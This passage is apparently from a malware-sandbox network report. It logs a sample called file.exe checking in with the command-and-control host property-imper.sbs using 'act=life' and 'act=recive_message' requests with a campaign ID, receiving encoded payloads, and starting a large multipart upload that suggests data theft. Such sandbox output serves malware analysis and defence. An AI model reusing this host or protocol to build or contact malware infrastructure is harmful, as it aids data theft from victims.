                                                                                                                                                                                              Nov 24, 2024 13:39:27.039161921 CET116INData Raw: 50 46 68 ff 4b 83 ea 16 05 c8 6e e5 d5 21 e7 4c 36 54 41 f1 db 9d ef 81 1b 27 03 e8 f6 5e 4e 0f 38 94 66 3d 27 c6 73 70 4a 6b 42 31 5f 68 73 ea 38 6a a7 49 3a 61 3a 80 ce 28 56 30 9d 60 e8 3b 4d 91 5c d1 0b 8b 8d 37 36 b9 f6 23 49 33 ff c9 35 84
                                                                                                                                                                                              Data Ascii: PFhKn!L6TA'^N8f='spJkB1_hs8jI:a:(V0`;M\76#I35k-h!+=>/[Ho,pa?NAh__6


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.649707104.21.33.1164435044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:04 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                              Host: property-imper.sbs
                                                                                                                                                                                              2024-11-24 12:39:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                              2024-11-24 12:39:05 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:05 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=mkunkdvhmgalqeudh98qtt3fkq; expires=Thu, 20-Mar-2025 06:25:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JmgLoF7%2FE%2Bjz8ug2O%2B9tYbrlbJypD6fg%2B4%2Fu61yufAcIqwhe9FXUOD3XoxekgvJv3qlzwLUb1hrXbwgOGQJ0B3H4VW1JGRa9jMLsMoYdOtOMyEdubOWoyz7Mq5JvGZFTjm1Ti5U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e7975ac1b0f41de-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2054&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1414043&cwnd=219&unsent_bytes=0&cid=a9c1797611686568&ts=1273&x=0"
                                                                                                                                                                                              2024-11-24 12:39:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                              2024-11-24 12:39:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.649709104.21.33.1164435044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:06 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 53
                                                                                                                                                                                              Host: property-imper.sbs
                                                                                                                                                                                              2024-11-24 12:39:06 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:07 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=6362j2sml8gh60fe2ut8k3ttmi; expires=Thu, 20-Mar-2025 06:25:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94ZHM8L3e%2B%2BeEn5c6S0tJMjzurRc4HPQuSippkP6i3loT9xU6KXtRNrICKx3wlgrIwIPJKRzOYYQ58o7XB6fdVQN6qvBY1BvaPBKW2jH%2BOKnfNMN0nsMWSo%2F5GwgYwt2Fci5pbg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e7975bd5bd343c8-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2125&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1348107&cwnd=191&unsent_bytes=0&cid=f3a2f52b43fdd689&ts=736&x=0"
                                                                                                                                                                                              2024-11-24 12:39:07 UTC354INData Raw: 31 64 38 61 0d 0a 33 77 4b 2f 62 34 50 64 65 56 77 30 6e 42 5a 57 34 48 46 2b 4a 41 33 6d 4c 59 45 68 6d 51 6d 65 58 4e 4d 77 37 38 58 57 30 65 47 6b 49 4d 6c 4e 75 65 6c 56 66 6b 66 35 4e 47 79 55 41 77 74 42 49 63 52 4d 35 51 4f 6a 62 2f 38 77 6f 46 58 44 35 36 43 38 77 2b 56 6b 33 67 50 77 75 46 56 2b 55 65 51 30 62 4c 73 4b 58 45 46 6a 78 42 65 6a 52 50 4e 72 2f 7a 43 78 55 59 53 71 70 72 32 43 74 32 37 59 42 2b 61 2b 48 54 31 59 38 58 4d 7a 68 52 41 55 53 6d 53 4c 52 65 77 44 74 53 76 37 4a 76 45 4b 7a 59 69 7a 70 59 43 53 59 38 77 45 6f 61 42 56 4a 78 62 35 65 48 54 61 55 78 39 42 62 34 70 4c 35 55 72 78 59 66 59 34 73 46 53 46 74 62 2b 33 69 62 64 67 32 77 62 73 74 77 6b 77 55 76 5a 34 4e 59 38 51 58 41 67 76 67 31 65 6a 47 37 73 34 7a 6a 32 67 51
                                                                                                                                                                                              Data Ascii: 1d8a3wK/b4PdeVw0nBZW4HF+JA3mLYEhmQmeXNMw78XW0eGkIMlNuelVfkf5NGyUAwtBIcRM5QOjb/8woFXD56C8w+Vk3gPwuFV+UeQ0bLsKXEFjxBejRPNr/zCxUYSqpr2Ct27YB+a+HT1Y8XMzhRAUSmSLRewDtSv7JvEKzYizpYCSY8wEoaBVJxb5eHTaUx9Bb4pL5UrxYfY4sFSFtb+3ibdg2wbstwkwUvZ4NY8QXAgvg1ejG7s4zj2gQ
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1369INData Raw: 73 68 73 73 58 76 56 2f 4d 5a 41 59 46 55 74 69 68 45 4c 70 54 50 68 72 2b 7a 53 37 58 59 65 6a 75 62 36 46 76 57 43 64 51 36 47 34 41 33 34 4f 76 6c 63 78 6b 68 51 51 55 43 32 2b 44 2f 77 4e 34 69 76 37 4d 76 45 4b 7a 61 2b 78 73 49 43 32 62 39 34 46 36 71 30 62 4c 46 44 7a 63 53 61 45 46 68 4a 4d 62 4a 5a 46 37 55 58 34 59 76 63 33 74 46 57 4a 35 2f 72 7a 68 4b 55 67 68 55 33 41 73 68 41 79 58 4f 6c 30 64 4a 31 64 42 51 5a 6f 69 41 2b 37 41 2f 39 71 2b 44 2b 31 58 49 4f 6a 75 4c 57 4e 73 47 2f 62 42 2b 47 34 45 54 5a 65 2f 33 6b 2f 6a 52 4d 5a 53 32 75 43 51 2b 4a 47 75 79 57 38 4f 61 6b 53 31 65 65 61 74 49 43 76 49 75 67 4f 37 37 45 63 4b 42 62 68 4f 69 33 43 46 42 41 47 4e 38 52 42 35 6b 7a 70 61 75 34 37 76 30 43 42 6f 72 4b 2b 67 4c 4e 67 32 41 72
                                                                                                                                                                                              Data Ascii: shssXvV/MZAYFUtihELpTPhr+zS7XYejub6FvWCdQ6G4A34OvlcxkhQQUC2+D/wN4iv7MvEKza+xsIC2b94F6q0bLFDzcSaEFhJMbJZF7UX4Yvc3tFWJ5/rzhKUghU3AshAyXOl0dJ1dBQZoiA+7A/9q+D+1XIOjuLWNsG/bB+G4ETZe/3k/jRMZS2uCQ+JGuyW8OakS1eeatICvIugO77EcKBbhOi3CFBAGN8RB5kzpau47v0CBorK+gLNg2Ar
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1369INData Raw: 42 62 68 4f 69 33 43 46 42 41 47 4e 38 52 44 36 6b 50 77 59 66 67 2b 74 6c 2b 49 70 4c 4f 77 6a 72 70 71 30 77 72 6c 73 78 49 7a 55 50 35 7a 4d 49 63 42 47 55 39 6a 69 41 2b 74 41 2f 78 7a 76 47 62 78 66 59 71 78 74 35 79 41 72 47 6d 64 45 71 2b 6d 57 7a 6c 61 76 69 78 30 68 52 59 55 54 57 6d 4d 54 2f 46 47 39 57 44 39 4e 4c 64 54 67 4b 75 79 73 34 4b 39 5a 74 45 4e 35 72 67 4a 4c 46 50 34 5a 6a 37 43 58 56 78 42 64 38 51 58 6f 33 58 72 66 4f 30 6f 38 32 65 4f 71 62 71 30 6c 66 31 2f 6b 78 53 68 75 42 64 2b 44 72 35 2f 4e 49 34 55 46 45 42 72 6a 45 44 73 53 75 6c 71 38 44 43 6a 56 59 32 75 75 72 79 50 74 47 33 61 41 4f 71 31 46 6a 70 52 2f 7a 52 36 77 68 51 45 42 6a 66 45 65 66 4e 4f 39 30 58 33 4d 72 67 53 6b 75 6d 74 38 34 53 78 49 49 56 4e 35 62 4d 54
                                                                                                                                                                                              Data Ascii: BbhOi3CFBAGN8RD6kPwYfg+tl+IpLOwjrpq0wrlsxIzUP5zMIcBGU9jiA+tA/xzvGbxfYqxt5yArGmdEq+mWzlavix0hRYUTWmMT/FG9WD9NLdTgKuys4K9ZtEN5rgJLFP4Zj7CXVxBd8QXo3XrfO0o82eOqbq0lf1/kxShuBd+Dr5/NI4UFEBrjEDsSulq8DCjVY2uuryPtG3aAOq1FjpR/zR6whQEBjfEefNO90X3MrgSkumt84SxIIVN5bMT
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1369INData Raw: 45 78 68 68 51 59 51 47 44 45 41 61 4e 45 34 79 75 6b 66 70 35 31 75 4f 57 56 69 63 4f 69 4c 73 52 4e 35 72 4e 62 5a 68 62 79 64 7a 69 4b 48 42 70 50 59 34 35 47 36 45 2f 77 62 2f 41 33 74 46 53 4d 6f 72 47 79 68 37 46 71 32 77 37 69 73 42 51 78 58 72 34 36 64 49 55 4c 58 42 34 76 6f 56 6a 6f 54 66 30 72 34 33 43 6f 45 6f 71 72 39 4f 76 44 73 57 6e 62 43 2b 53 7a 47 6a 68 65 2b 33 77 77 67 78 55 61 52 57 43 41 53 75 4a 4d 2f 32 66 79 4e 4c 42 54 67 61 79 37 75 49 62 39 4c 70 30 4b 2b 66 39 44 66 6d 66 39 59 69 4f 53 48 31 78 5a 49 5a 30 50 35 45 2b 37 4d 37 77 2f 6f 31 69 48 71 62 47 38 68 72 35 76 32 67 44 6e 73 78 45 33 58 76 68 37 50 5a 41 51 45 45 68 6f 69 6b 50 74 54 76 46 6f 38 58 37 2f 45 6f 71 2f 39 4f 76 44 6b 57 66 51 49 2b 71 7a 48 48 35 4a 73
                                                                                                                                                                                              Data Ascii: ExhhQYQGDEAaNE4yukfp51uOWVicOiLsRN5rNbZhbydziKHBpPY45G6E/wb/A3tFSMorGyh7Fq2w7isBQxXr46dIULXB4voVjoTf0r43CoEoqr9OvDsWnbC+SzGjhe+3wwgxUaRWCASuJM/2fyNLBTgay7uIb9Lp0K+f9Dfmf9YiOSH1xZIZ0P5E+7M7w/o1iHqbG8hr5v2gDnsxE3Xvh7PZAQEEhoikPtTvFo8X7/Eoq/9OvDkWfQI+qzHH5Js
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1369INData Raw: 54 47 31 34 76 33 41 2f 56 52 4f 74 37 2f 33 79 41 52 49 36 78 76 37 36 50 2f 58 2b 54 46 4b 47 34 46 33 34 4f 76 6e 49 37 69 78 41 54 52 32 61 49 51 75 5a 4b 2f 6d 72 36 4f 72 74 59 6a 61 47 79 73 6f 61 33 59 39 77 48 36 4c 67 54 4f 56 58 73 4e 48 72 43 46 41 51 47 4e 38 52 6d 35 46 48 31 65 37 77 68 2f 30 76 4e 6f 4c 6a 7a 32 2f 31 6b 31 77 4c 6c 75 42 63 34 55 2f 68 35 4e 59 30 53 48 45 6c 72 6a 30 62 6c 51 76 5a 75 38 54 71 6a 57 49 61 6f 75 4c 71 50 73 43 43 54 54 65 61 6e 57 32 59 57 7a 33 6b 36 6a 42 51 4b 42 6e 44 4b 56 71 4e 45 39 79 75 6b 66 72 42 65 67 71 53 37 73 49 43 38 61 73 38 66 37 62 59 54 4f 31 72 31 65 6a 4b 51 46 52 4e 50 62 49 64 47 35 45 76 33 59 66 38 35 38 52 7a 4e 6f 4b 7a 7a 32 2f 31 44 79 68 33 73 2f 77 52 77 54 37 35 7a 4f 4d
                                                                                                                                                                                              Data Ascii: TG14v3A/VROt7/3yARI6xv76P/X+TFKG4F34OvnI7ixATR2aIQuZK/mr6OrtYjaGysoa3Y9wH6LgTOVXsNHrCFAQGN8Rm5FH1e7wh/0vNoLjz2/1k1wLluBc4U/h5NY0SHElrj0blQvZu8TqjWIaouLqPsCCTTeanW2YWz3k6jBQKBnDKVqNE9yukfrBegqS7sIC8as8f7bYTO1r1ejKQFRNPbIdG5Ev3Yf858RzNoKzz2/1Dyh3s/wRwT75zOM
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1369INData Raw: 66 59 46 4a 37 45 7a 79 59 76 67 32 73 6c 4b 4a 6f 37 4f 32 67 4c 46 72 32 67 37 75 75 78 49 77 58 2f 45 30 65 73 49 55 42 41 59 33 78 47 37 34 51 50 64 6d 76 43 48 2f 53 38 32 67 75 50 50 62 2f 57 7a 54 43 4f 47 31 48 54 70 54 2b 48 34 78 67 68 67 66 53 57 75 43 53 2b 78 44 38 47 4c 39 4f 4c 52 59 68 71 47 35 73 49 57 37 49 4a 4e 4e 35 71 64 62 5a 68 62 65 62 7a 6d 4f 46 46 78 5a 49 5a 30 50 35 45 2b 37 4d 37 77 31 76 56 61 4b 70 37 6d 77 69 37 68 6b 31 77 6a 68 74 77 6b 32 56 76 6c 6d 4a 6f 49 61 47 55 70 73 68 45 76 6c 53 76 31 6f 2b 48 37 2f 45 6f 71 2f 39 4f 76 44 6b 47 7a 61 4a 4f 61 6b 57 79 45 59 35 7a 51 7a 6a 6c 4e 45 42 6d 36 50 52 65 78 4f 2b 47 33 2f 4e 62 52 59 6a 4b 43 38 76 70 47 2b 62 39 49 4a 34 62 41 64 4f 46 66 78 63 6a 4f 4c 45 68 52
                                                                                                                                                                                              Data Ascii: fYFJ7EzyYvg2slKJo7O2gLFr2g7uuxIwX/E0esIUBAY3xG74QPdmvCH/S82guPPb/WzTCOG1HTpT+H4xghgfSWuCS+xD8GL9OLRYhqG5sIW7IJNN5qdbZhbebzmOFFxZIZ0P5E+7M7w1vVaKp7mwi7hk1wjhtwk2VvlmJoIaGUpshEvlSv1o+H7/Eoq/9OvDkGzaJOakWyEY5zQzjlNEBm6PRexO+G3/NbRYjKC8vpG+b9IJ4bAdOFfxcjOLEhR
                                                                                                                                                                                              2024-11-24 12:39:07 UTC371INData Raw: 64 31 6b 37 57 48 37 4c 72 5a 46 67 75 66 36 38 34 7a 39 4f 4f 52 4e 36 4c 67 41 4c 30 44 7a 5a 44 50 43 4c 46 49 47 64 38 51 58 6f 33 62 34 5a 66 49 35 70 30 50 41 67 4b 4b 35 68 4b 31 6e 79 67 4b 68 38 56 73 34 46 71 59 6e 65 73 49 58 44 51 59 33 31 42 32 34 46 71 67 38 72 47 79 75 48 4a 54 6e 6f 76 50 62 37 79 36 64 48 36 48 6e 57 33 6c 56 37 47 59 79 67 51 55 66 41 56 47 36 61 50 6c 4f 2f 58 7a 74 41 49 39 56 6c 36 71 79 70 4a 4c 78 64 64 34 44 37 37 67 4e 66 68 69 2b 65 33 54 61 4b 6c 77 4f 4c 37 73 42 6f 31 75 37 4d 37 77 4c 73 6c 79 44 6f 4b 4b 69 7a 70 70 36 30 41 76 32 72 6c 74 77 46 76 67 30 62 4e 4a 64 58 45 4a 2b 78 42 65 7a 45 61 41 2b 72 32 6e 68 41 4a 4c 70 72 66 4f 56 2f 54 69 50 51 36 47 74 57 32 59 57 75 58 63 6d 6b 42 55 66 55 47 7a 44
                                                                                                                                                                                              Data Ascii: d1k7WH7LrZFguf684z9OORN6LgAL0DzZDPCLFIGd8QXo3b4ZfI5p0PAgKK5hK1nygKh8Vs4FqYnesIXDQY31B24Fqg8rGyuHJTnovPb7y6dH6HnW3lV7GYygQUfAVG6aPlO/XztAI9Vl6qypJLxdd4D77gNfhi+e3TaKlwOL7sBo1u7M7wLslyDoKKizpp60Av2rltwFvg0bNJdXEJ+xBezEaA+r2nhAJLprfOV/TiPQ6GtW2YWuXcmkBUfUGzD
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1369INData Raw: 32 36 65 32 0d 0a 31 45 37 48 49 33 6c 42 42 62 65 46 47 48 57 65 35 4d 38 47 72 43 41 4a 39 66 6a 4b 53 36 38 62 4b 72 62 63 30 4f 35 4c 67 6c 41 46 6a 35 59 44 4f 4d 46 52 77 47 49 63 52 41 6f 78 76 43 4b 37 52 2b 6a 68 7a 4e 76 2f 54 72 77 34 68 6a 30 77 50 6d 71 51 70 7a 64 65 68 35 4f 34 6b 53 58 41 67 76 67 67 2b 37 45 37 55 72 2b 43 2f 78 43 74 33 31 37 2b 62 51 36 6a 43 50 45 71 2b 6d 57 79 67 57 70 69 5a 36 77 67 46 63 48 69 2f 44 51 65 35 43 2b 47 58 2f 4c 4b 4e 55 6a 72 47 33 39 4c 32 44 51 64 41 47 37 62 49 55 4e 57 6a 41 56 54 6d 4a 48 78 46 4a 5a 4c 70 78 39 6b 44 31 5a 66 73 6f 6f 42 4c 44 35 37 76 7a 32 34 51 67 6c 55 33 65 38 56 73 6d 46 71 59 30 41 59 45 64 45 6b 46 35 6c 51 4c 43 54 76 42 6e 38 54 47 36 45 73 50 6e 73 76 50 62 37 53 36
                                                                                                                                                                                              Data Ascii: 26e21E7HI3lBBbeFGHWe5M8GrCAJ9fjKS68bKrbc0O5LglAFj5YDOMFRwGIcRAoxvCK7R+jhzNv/Trw4hj0wPmqQpzdeh5O4kSXAgvgg+7E7Ur+C/xCt317+bQ6jCPEq+mWygWpiZ6wgFcHi/DQe5C+GX/LKNUjrG39L2DQdAG7bIUNWjAVTmJHxFJZLpx9kD1ZfsooBLD57vz24QglU3e8VsmFqY0AYEdEkF5lQLCTvBn8TG6EsPnsvPb7S6
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1369INData Raw: 67 77 39 52 76 68 33 43 72 77 34 45 45 42 6f 6e 6b 6a 6c 5a 64 73 72 73 6e 36 2b 45 74 57 65 39 50 76 44 67 69 36 64 46 61 48 6e 57 77 74 56 38 48 6f 7a 6c 41 4a 52 59 33 69 48 58 2b 56 41 75 79 57 38 4f 50 45 4b 33 65 6e 30 74 35 4c 39 4f 49 31 66 75 75 70 49 61 51 61 73 61 33 71 62 55 77 6f 47 4e 39 59 42 6f 31 47 37 4d 37 78 35 73 6b 43 66 6f 62 65 6c 67 50 70 65 34 79 76 69 72 68 45 66 57 2b 35 7a 43 72 77 47 48 30 68 68 67 31 6e 79 41 37 55 72 38 33 37 70 61 38 33 76 2b 4c 57 41 71 79 44 69 51 36 47 6e 57 32 59 57 79 33 63 36 6a 42 51 4b 56 79 4b 69 54 50 4a 4a 32 6d 62 73 4f 66 45 63 7a 61 48 30 36 39 44 7a 49 4e 6b 63 6f 65 64 4c 62 41 32 72 4a 32 50 53 51 51 4d 49 64 73 52 5a 6f 78 75 70 4a 62 77 73 38 51 72 4e 34 4c 65 68 6b 62 74 6a 79 77 36 6d
                                                                                                                                                                                              Data Ascii: gw9Rvh3Crw4EEBonkjlZdsrsn6+EtWe9PvDgi6dFaHnWwtV8HozlAJRY3iHX+VAuyW8OPEK3en0t5L9OI1fuupIaQasa3qbUwoGN9YBo1G7M7x5skCfobelgPpe4yvirhEfW+5zCrwGH0hhg1nyA7Ur837pa83v+LWAqyDiQ6GnW2YWy3c6jBQKVyKiTPJJ2mbsOfEczaH069DzINkcoedLbA2rJ2PSQQMIdsRZoxupJbws8QrN4Lehkbtjyw6m


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              2192.168.2.64970820.198.119.143443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:07 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 41 50 45 2b 4a 41 4b 66 78 55 71 44 69 48 31 41 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 31 35 62 61 35 39 34 33 33 64 62 66 61 65 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: APE+JAKfxUqDiH1A.1Context: bd15ba59433dbfae
                                                                                                                                                                                              2024-11-24 12:39:07 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                              2024-11-24 12:39:07 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 41 50 45 2b 4a 41 4b 66 78 55 71 44 69 48 31 41 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 31 35 62 61 35 39 34 33 33 64 62 66 61 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 33 67 4a 6a 56 2b 4c 6c 52 52 4f 35 34 6f 43 36 51 42 74 34 30 36 63 61 52 58 54 66 66 49 6b 43 4e 76 2b 39 4b 42 47 55 31 66 4d 62 30 6c 55 62 63 77 48 78 59 4c 76 49 49 6e 4d 78 64 6c 34 6a 6b 39 51 46 63 4c 67 35 61 4c 31 4b 45 42 6c 47 71 42 77 47 34 34 67 47 63 4a 67 55 62 37 67 44 34 65 41 69 55 52 78 69 4d 78 5a 6d
                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: APE+JAKfxUqDiH1A.2Context: bd15ba59433dbfae<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ3gJjV+LlRRO54oC6QBt406caRXTffIkCNv+9KBGU1fMb0lUbcwHxYLvIInMxdl4jk9QFcLg5aL1KEBlGqBwG44gGcJgUb7gD4eAiURxiMxZm
                                                                                                                                                                                              2024-11-24 12:39:07 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 41 50 45 2b 4a 41 4b 66 78 55 71 44 69 48 31 41 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 31 35 62 61 35 39 34 33 33 64 62 66 61 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: APE+JAKfxUqDiH1A.3Context: bd15ba59433dbfae<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                              2024-11-24 12:39:07 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                              2024-11-24 12:39:07 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4c 4c 63 67 70 73 47 66 38 45 4b 35 53 61 35 32 6d 6d 74 6d 53 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                              Data Ascii: MS-CV: LLcgpsGf8EK5Sa52mmtmSA.0Payload parsing failed.


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.649710104.21.33.1164435044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:09 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=2NU9D4UIJLK
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 12823
                                                                                                                                                                                              Host: property-imper.sbs
